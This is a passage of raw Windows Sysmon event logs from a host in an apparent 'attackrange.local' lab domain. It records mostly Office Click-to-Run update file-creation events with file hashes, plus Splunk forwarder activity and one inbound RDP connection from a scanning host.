Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\SkypeSrv\SKYPESERVER.EXEMD5=CC577C6EA81CF2EFEA8B5DB15E4E093B,SHA256=59296CA34FF16C8AC081F8D7640B082BC1D8418BCB36EAAB4DE42528C26CFA26,IMPHASH=A0EEAC06F53BEF9151FF8709DD6FD6FDtruetrue 23542300x800000000000000069916Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\SkypeSrv\SFBAPPSDK.DLLMD5=F23D4BF8D6C250F4B20B58F8073E0F4A,SHA256=DB3410DDC4F58647B131FB2666727CE1D8C61C93DF47632DA4D906029FDDF24D,IMPHASH=8FA01D11BC27EAE3BECBF5C9AC227862truetrue 354300x800000000000000069915Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.171{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com49352-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000069914Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\SkypeSrv\MSO20SKYPEWIN32.DLLMD5=D895AAB8A35EBACD8C90024DBA7E4A09,SHA256=848E34A217D4777F97678704C3630545F1E56BBF02311100AD023F79FF7F38B8,IMPHASH=06B74978F7BAA85F55AA57A08A5E7A30truetrue 23542300x800000000000000069913Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\sdxs.xmlMD5=64846BFE88CD7B6A58516F7EB6C39545,SHA256=34EA5EF1CC912811419960ACD870E1DD25ABC71CD856F12CD0E0FE8FA4E436C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069912Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000062\strings.resjsonMD5=ABD892C058CF07E88194186ED60C9301,SHA256=7CB64AFFB5C27C067B53065CE5312D64164C456707FBDABA91EF4ADDD216F70D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069911Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000062\StoreLogo.pngMD5=3B41150E4CB804AA1B26CCA06DC509C8,SHA256=EA757E4A70287F2A5AD3C5388ED2342BFAD38CA41969EA23C84D8CD499839D9C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069910Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000062\manifest.xmlMD5=09581FFB5A9B27F5D8BDF97DE3C33EEF,SHA256=824BBC8F853A3E84693D15CC71A5E801A7151A28E3D27DA4DC09EBC6AD9B866A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069909Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000062\main.stats.jsonMD5=F3223E7F1964DC09BF0AA655DC5AD9F6,SHA256=CE6C3FF845C2D8FBF4F184C27D39B3193E4BD7896E0E890C53AE4CA35CD55B13,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069908Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000062\index.win32.bundle.mapMD5=D922276A251F1C96F9E27AF2E60EB7B5,SHA256=4276EA4D4C3369A46910BB7B936C8C5F1B7F18F61D6CEA6F775BFE536BFCCE0C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069907Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000062\index.win32.bundleMD5=E1B5CD5A98B35684FCACFB6CA7E331F0,SHA256=E61EC9EEA138A288B186DE6554F0A0793A0F839596AA2CFF884D0F7C0D8575BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069906Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000062\catalog.jsonMD5=42771E998068F7DC1E8E002A9ED5071D,SHA256=6AE9C84A1A54FA7CC63DE61DADDAEDA5B1F56B31E1EA27823B098EAEE96D3986,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069905Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000058\strings.resjsonMD5=9A2DEAF48A40FD8FCBACCCA91A0B4EC8,SHA256=19DF2927A07C4814D14780C357EFA0EC868C7CEF2AE6B956668739112604EA2A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069904Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000058\StoreLogo.pngMD5=3B41150E4CB804AA1B26CCA06DC509C8,SHA256=EA757E4A70287F2A5AD3C5388ED2342BFAD38CA41969EA23C84D8CD499839D9C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069903Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000058\manifest.xmlMD5=604356A7D5809076B18A106DC735476D,SHA256=EA0A713A476996B9568AE20CF5572CEDB99E9BC65AF83FD6EB936770924E686F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069902Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000058\main.stats.jsonMD5=760FC874ABA437BCE8D165CDB3CEE0DB,SHA256=8CEAA4537817E9BF87E8B20201402B52A68F11E035416864E35BDC8EC714DE94,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069901Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.204{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000058\index.win32.bundle.mapMD5=93C5AD74DB04E0F251F0B6070FE70168,SHA256=F9B88124217CE4276EA0850BB025ADC0F09FC73DAEEC845D84A74C0078450D51,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069900Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000058\index.win32.bundleMD5=3757D061170EBED40D1DB34A77569EAC,SHA256=28D333EBCAE1ACA90C1F1C70AAC0B94E9664DE878528AEA8AF191980B47F3087,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069899Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000058\catalog.jsonMD5=42771E998068F7DC1E8E002A9ED5071D,SHA256=6AE9C84A1A54FA7CC63DE61DADDAEDA5B1F56B31E1EA27823B098EAEE96D3986,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069898Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000056\manifest.xmlMD5=90B309DB8E2151F6164008A6AEF3C4B1,SHA256=DE9AE50B380D09D370D01C23DA28990670217E224ABCE75AC541D261593C16DD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069897Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000056\main.stats.jsonMD5=52A478FFF7EDC6CBD2567341034C214A,SHA256=54B40BA860331148AF4B829709CD265BE0B07FA590BFE825005CCC07339E34E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069896Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.079{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000056\index.win32.bundle.mapMD5=80EE3941C64B7C921848BA0672776A73,SHA256=7B5FDBC27C75BAFDD7D7582093EF92188F84C75F8A1AE39C403A4A4E6E70AD25,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069895Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000056\index.win32.bundle.LICENSE.txtMD5=A9A614F45B24E5E88908D8BE767DC54F,SHA256=9EE28EE635B9792AAEFA285826AA8BDD32304C962404836230B67AD66E4A5B2E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069894Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000056\index.win32.bundleMD5=4713425A59FEB4BCF7DB7BE68D415355,SHA256=88A35E1A455E6993BDCD7C55D26D9838469CACD68D87B113533E04017468E059,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069893Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000056\catalog.jsonMD5=0061E64863F318FD653F5F4E4329DDCF,SHA256=3DBBEE504D472E3F8A15106DF8BCA472782A4179A49BACC4E3BF2341F6BD3F21,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069892Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000056\BundleIcon.pngMD5=0A3E95561C219078E0A2D2479F069F4E,SHA256=16EB1E78978BDB3F72C168C02D096B0843F955700003DF9BA6DC57C763B071C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069891Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000056\app.jsonMD5=F3B44CDC7F6E822D517A2955E251BE92,SHA256=679C7934F24C1E2D226660F7268A0EEBA91E2CFC55F893C749641B7CA2EB6E01,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069890Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000054\urlmap.iniMD5=551A26D601545482F4F94F733E1F9779,SHA256=98A7CABD175A7B2DE3D4835DFEEF5250C4FACFC864D1D88F05FB930B89FECDD3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069889Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000054\manifest.xmlMD5=C735285206F91B17CD45E52A5D4D6560,SHA256=6F3B71C137470C7813878DC6A3B9C2F94B7343207D1FB8652F6C1991C8556040,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069888Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000054\icon-32_b62bf135812d19b144fb591e3966e8ed.pngMD5=95EF187DADFAA5A8726CD087285C37F4,SHA256=F7BBECFB6EFAE634755F18662B5B19F13B6C4EEDBCC49366DFC3947771498C63,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069887Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000054\OfflineFiles\vendor.js.mapMD5=540683BCAC616489092ECC376E78A3EF,SHA256=2B1DEF34937E6A945472047D7705E9D556A7F1285ADF19F29955EA1EAE87A641,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049762Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:26.913{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1DB7F5A39E6E2EB58BBF053D65CD388,SHA256=7075E9671C3715986915595FBBAC3FF0907893C52FC6E9C46AA764A3A00CE8FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069993Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:27.751{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=14B7861BB64BC16763810068C04667B5,SHA256=E92197E36A5254AC47349C1AD4527210D76D01B817DB47D3B3890028F79E17F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069992Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:27.704{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\excel-udf-host.win32.bundleMD5=2DE676283877EBB21CD4C4BA89B574E3,SHA256=DC434F4FA988B9C784E68E5C464ABFF8CAB840A783C5B870A5D7EDD816D167E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069991Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:27.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ENVELOPE.DLLMD5=3A88E31BA166B9591887726DCA23B621,SHA256=C7DE56F548E99DCB5DCC0CD91A353D35DDE32AA42E43E47838F7E18C4BB72064,IMPHASH=FFE92875AD77BDDEB8B7378F43FF7181truetrue 23542300x800000000000000069990Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:27.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\EntityPicker.dllMD5=A6969ACE0E954F3D3743F2A4F1EDF940,SHA256=8EADAC42042CC228C4BC715291C699DF874272F35C78B83B78C4698724ED2E9C,IMPHASH=CE14847D61E500BB639BD1F17E58DEFCtruetrue 23542300x800000000000000069989Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:27.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\EntityDataHandler.dllMD5=B0C1AADFDCDCCE3B1EEF886C9B292118,SHA256=11C961897FCD585A2A14C56112EB1A4C522F0E8483B7D0E7C0722EC91DA37D95,IMPHASH=9BAE1E9BC1E183C279A58F9056AF6F36truetrue 23542300x800000000000000069988Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:27.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\EMSMDB32.DLLMD5=211DA2CC52037E120B0CA0C7E49FAF90,SHA256=C381AF632525B7531CC4F82AEEC3B54F68FA6AB35A1204A5295BC3677D4E6108,IMPHASH=F316814CB40BA213EFEF52BB022385CFtruetrue 23542300x800000000000000069987Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:27.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\EMABLT32.DLLMD5=314272355A53FB92F6A260715FB03A96,SHA256=A6AAC6DE337894805613D3186542D918762A71AC2AC0B9926AFC4FE727124556,IMPHASH=7C9F5C225DD7D5CA4F5103D0717E60F2truetrue 23542300x800000000000000069986Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:27.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\DLGSETP.DLLMD5=52244FF15ACF0B966DDE87098AED2919,SHA256=5B5965D4D1112861B8AF84DD115FDAE18DB7424BF9C7BDE28200F2BC8D5D0F77,IMPHASH=39AB1B1278C597C66987E205B9048C96truetrue 23542300x800000000000000069985Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:27.579{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\DIFF_MATCH_PATCH_WIN32.DLLMD5=541C162F03B1DBFC0E1174C856071902,SHA256=63707931B84EE7FDCA3C4F53CBA7FF3BFD92B95EDECF281EB282E08B581C3D7A,IMPHASH=9AF387F4B4286D9C94E553CB7A4BB504truetrue 23542300x800000000000000069984Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:27.579{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\DBGHELP.DLLMD5=3AD4BA5FD42E006E38D60AC93FD882E1,SHA256=502593C125B3DCF31D4565FCA6CF49E75233E1D6F3A7DEF2E2E2431E2501D349,IMPHASH=BB529474C9F4922E66F0E0B9D3349BC3truetrue 23542300x800000000000000069983Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:27.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\DBGCORE.DLLMD5=9E429DD6F0C40FFA9451CB04979ED694,SHA256=50F28ED8D5290837EF8CF3839D795E97B7D6DA9F0DBD37999FB0AD719B3FBF32,IMPHASH=9D75F08EA29885182B136CE4FF854114truetrue 23542300x800000000000000069982Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:27.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Custom.propdescMD5=FF4E7C50EF8D79478C07DE965C15D97B,SHA256=FF3187DD37533BAF89C73F66CB4635D6327692745418620B252957B86C33FD89,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069981Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:27.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\CSS7DATA000C.DLLMD5=62BD0ED4DAF711195AEDE2AA801E6CD7,SHA256=5C162822CD1E50F0857C0F2FF94D3321A9BF535CA05CDFEAEAE45FD223A656F8,IMPHASH=944FB94D5355929AC228E24ACBD13DD4truetrue 23542300x800000000000000069980Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:27.532{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 